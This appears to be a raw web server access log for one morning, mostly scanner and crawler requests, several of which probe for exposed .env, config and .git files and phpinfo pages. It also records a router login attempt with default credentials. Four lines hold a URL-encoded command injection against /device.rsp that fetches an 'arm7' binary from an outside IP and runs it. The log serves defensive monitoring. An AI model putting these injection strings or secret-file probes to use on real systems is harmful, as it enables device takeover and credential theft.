78.153.140.179 - - [22/Feb/2025:05:01:37 +0100] "GET /configurations/.env HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2"
78.153.140.179 - - [22/Feb/2025:05:01:38 +0100] "GET /core/database/.env HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
156.59.198.136 - - [22/Feb/2025:05:01:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908141203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
78.153.140.179 - - [22/Feb/2025:05:01:41 +0100] "GET /cpresources/.env HTTP/1.1" 404 361 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDS; .NET4.0C; MS-RTC LM 8)"
78.153.140.179 - - [22/Feb/2025:05:01:46 +0100] "GET /env_variables.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0"
78.153.140.179 - - [22/Feb/2025:05:01:48 +0100] "GET /extension/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36"
78.153.140.179 - - [22/Feb/2025:05:01:50 +0100] "GET /functions/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SCH-R820 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.179 - - [22/Feb/2025:05:01:51 +0100] "GET /javascript/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SAMSUNG-SGH-I577 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.179 - - [22/Feb/2025:05:01:54 +0100] "GET /laravel/public/.env HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0"
78.153.140.179 - - [22/Feb/2025:05:01:56 +0100] "GET /newsite/.env HTTP/1.1" 404 357 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B137 Safari/601.1"
78.153.140.179 - - [22/Feb/2025:05:01:57 +0100] "GET /node_modules/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.57"
78.153.140.179 - - [22/Feb/2025:05:01:58 +0100] "GET /owncloud/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows 8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30"
78.153.140.179 - - [22/Feb/2025:05:01:58 +0100] "GET /packages/web/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.35"
78.153.140.179 - - [22/Feb/2025:05:01:58 +0100] "GET /pemerintah/.env HTTP/1.1" 404 360 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
78.153.140.179 - - [22/Feb/2025:05:01:59 +0100] "GET /portal2/.env HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; BRI/2; Tablet PC 2.0; MDDRJS)"
78.153.140.179 - - [22/Feb/2025:05:01:59 +0100] "GET /registration/.env HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"
78.153.140.179 - - [22/Feb/2025:05:01:59 +0100] "GET /site-library/.env HTTP/1.1" 404 362 "-" "Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1"
78.153.140.179 - - [22/Feb/2025:05:02:01 +0100] "GET /spearmint/.env HTTP/1.1" 404 359 "-" "Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.39.24.3 (POLAROID, Mxl661L32, wireless) VSTVB_MB97 SmartTvA/3.0.0"
78.153.140.179 - - [22/Feb/2025:05:02:02 +0100] "GET /src/main/front-end/.env HTTP/1.1" 404 368 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"
78.153.140.179 - - [22/Feb/2025:05:02:05 +0100] "GET /stylesheets/.env HTTP/1.1" 404 361 "-" "Opera/9.80 (Android; Opera Mini/19.0.2254/37.9031; U; en) Presto/2.12.423 Version/12.16"
78.153.140.179 - - [22/Feb/2025:05:02:06 +0100] "GET /user-config.json HTTP/1.1" 404 361 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-gb; GT-I9300 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher"
78.153.140.179 - - [22/Feb/2025:05:02:08 +0100] "GET /web-dist/.env HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
78.153.140.179 - - [22/Feb/2025:05:02:08 +0100] "GET /webstatic/.env HTTP/1.1" 404 359 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19"
156.59.198.136 - - [22/Feb/2025:05:05:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202102091603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:05:09:41 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-ca.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:05:13:41 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-is.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:05:17:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106231003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:05:21:42 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-cz.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.51 - - [22/Feb/2025:05:21:58 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.242.226.116 - - [22/Feb/2025:05:30:32 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
218.75.38.212 - - [22/Feb/2025:05:32:24 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
141.255.166.90 - - [22/Feb/2025:05:34:06 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
196.251.69.18 - - [22/Feb/2025:05:44:27 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0"
115.238.44.234 - - [22/Feb/2025:05:47:49 +0100] "GET / HTTP/1.0" 200 423 "-" "-"
68.183.8.234 - - [22/Feb/2025:05:49:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [22/Feb/2025:05:55:50 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009290903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:05:59:50 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-pl.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:06:04:09 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-sr.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.181.187.69 - - [22/Feb/2025:06:10:07 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
193.68.89.51 - - [22/Feb/2025:06:11:15 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
141.255.166.90 - - [22/Feb/2025:06:17:06 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [22/Feb/2025:06:24:02 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001231003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.138.16.243 - - [22/Feb/2025:06:31:42 +0100] "GET /wp-content/plugins/jalobola/install.php HTTP/1.1" 404 312 "http://triadian.castlegem.co.uk" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8"
3.23.113.181 - - [22/Feb/2025:06:36:14 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.23.113.181 - - [22/Feb/2025:06:36:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.23.113.181 - - [22/Feb/2025:06:37:29 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.23.113.181 - - [22/Feb/2025:06:37:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.23.113.181 - - [22/Feb/2025:06:37:47 +0100] "SSH-2.0-Go" 400 383 "-" "-"
3.23.113.181 - - [22/Feb/2025:06:42:32 +0100] "" 400 383 "-" "-"
193.68.89.10 - - [22/Feb/2025:06:54:04 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.31.250.60 - - [22/Feb/2025:06:57:22 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
92.154.95.236 - - [22/Feb/2025:06:59:57 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
156.59.198.136 - - [22/Feb/2025:07:03:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12018009.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:07:07:13 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-cn.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:07:08:08 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
94.181.187.69 - - [22/Feb/2025:07:17:52 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
92.154.95.236 - - [22/Feb/2025:07:33:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
92.154.95.236 - - [22/Feb/2025:07:33:36 +0100] "GET /owa/auth/logon.aspx HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
92.154.95.236 - - [22/Feb/2025:07:33:48 +0100] "GET /.git/index HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
92.154.95.236 - - [22/Feb/2025:07:33:59 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
92.154.95.236 - - [22/Feb/2025:07:34:11 +0100] "GET /centreon/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
91.224.92.10 - - [22/Feb/2025:07:34:27 +0100] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.124%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 284 "-" "Mozila/5.0"
92.154.95.236 - - [22/Feb/2025:07:34:31 +0100] "GET /.well-known/security.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 ANSSI security.txt fetch (https://www.cert.ssi.gouv.fr/scans/)"
156.59.198.135 - - [22/Feb/2025:07:47:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11213679.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:07:51:21 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006121703_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:07:55:19 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
156.59.198.135 - - [22/Feb/2025:07:55:21 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-en.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [22/Feb/2025:07:58:41 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36"
156.59.198.135 - - [22/Feb/2025:08:05:28 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-sr.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [22/Feb/2025:08:06:43 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
91.224.92.10 - - [22/Feb/2025:08:10:34 +0100] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.124%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 284 "-" "Mozila/5.0"
156.59.198.135 - - [22/Feb/2025:08:12:47 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910161403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:08:24:37 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243500.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.146.51 - - [22/Feb/2025:08:38:48 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
167.94.146.51 - - [22/Feb/2025:08:38:52 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.51 - - [22/Feb/2025:08:38:53 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.51 - - [22/Feb/2025:08:38:53 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.51 - - [22/Feb/2025:08:38:55 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
167.94.146.51 - - [22/Feb/2025:08:38:59 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.51 - - [22/Feb/2025:08:38:59 +0100] "\x16\x03\x01" 400 383 "-" "-"
80.82.77.202 - - [22/Feb/2025:08:39:59 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36"
118.45.130.120 - - [22/Feb/2025:08:40:14 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
141.255.166.90 - - [22/Feb/2025:08:42:46 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
216.218.206.67 - - [22/Feb/2025:08:46:02 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
216.218.206.67 - - [22/Feb/2025:08:49:15 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
216.218.206.67 - - [22/Feb/2025:08:49:58 +0100] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
193.68.89.10 - - [22/Feb/2025:08:50:17 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.218.206.67 - - [22/Feb/2025:08:50:28 +0100] "GET /info.php HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
216.218.206.67 - - [22/Feb/2025:08:50:30 +0100] "GET /phpinfo.php HTTP/1.1" 200 10253 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
216.218.206.67 - - [22/Feb/2025:08:50:32 +0100] "GET /dashboard/phpinfo.php HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
156.59.198.136 - - [22/Feb/2025:08:57:36 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001021203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.224.92.10 - - [22/Feb/2025:08:57:57 +0100] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.124%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 284 "-" "Mozila/5.0"
156.59.198.135 - - [22/Feb/2025:09:01:36 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-dk.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
86.107.100.94 - - [22/Feb/2025:09:10:40 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"
118.26.104.93 - - [22/Feb/2025:09:13:24 +0100] "\x16\x03\x01\x01\x17\x01" 400 383 "-" "-"
118.26.104.93 - - [22/Feb/2025:09:13:35 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
118.26.104.93 - - [22/Feb/2025:09:13:35 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.26.104.93 - - [22/Feb/2025:09:13:35 +0100] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.26.104.93 - - [22/Feb/2025:09:13:35 +0100] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
118.26.104.93 - - [22/Feb/2025:09:13:35 +0100] "GET /config.json HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
91.224.92.10 - - [22/Feb/2025:09:14:46 +0100] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.124%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 284 "-" "Mozila/5.0"
213.21.1.254 - - [22/Feb/2025:09:19:43 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
59.89.68.222 - - [22/Feb/2025:09:23:07 +0100] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 378 "-" "-"
141.255.166.90 - - [22/Feb/2025:09:30:00 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
86.158.26.23 - - [22/Feb/2025:09:53:56 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [22/Feb/2025:10:10:44 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12243528.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:10:14:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010121403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Feb/2025:10:18:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12017942.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.120.230.215 - - [22/Feb/2025:10:19:05 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [22/Feb/2025:10:22:45 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202110081403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.255.166.90 - - [22/Feb/2025:10:23:53 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 371 "-" "-"
185.224.128.97 - - [22/Feb/2025:10:24:17 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
185.224.128.97 - - [22/Feb/2025:10:24:17 +0100] "POST /HNAP1/ HTTP/1.1" 404 281 "-" "Mozila/5.0"
147.185.132.234 - - [22/Feb/2025:10:24:41 +0100] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
193.68.89.10 - - [22/Feb/2025:10:35:41 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
57.129.64.10 - - [22/Feb/2025:10:35:42 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.135 - - [22/Feb/2025:10:42:08 +0100] "GET /ed-test.2web.at/stats/lang/tooltips_w/awstats-tt-de.txt HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:10:50:14 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10619275.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Feb/2025:10:54:14 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008311503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
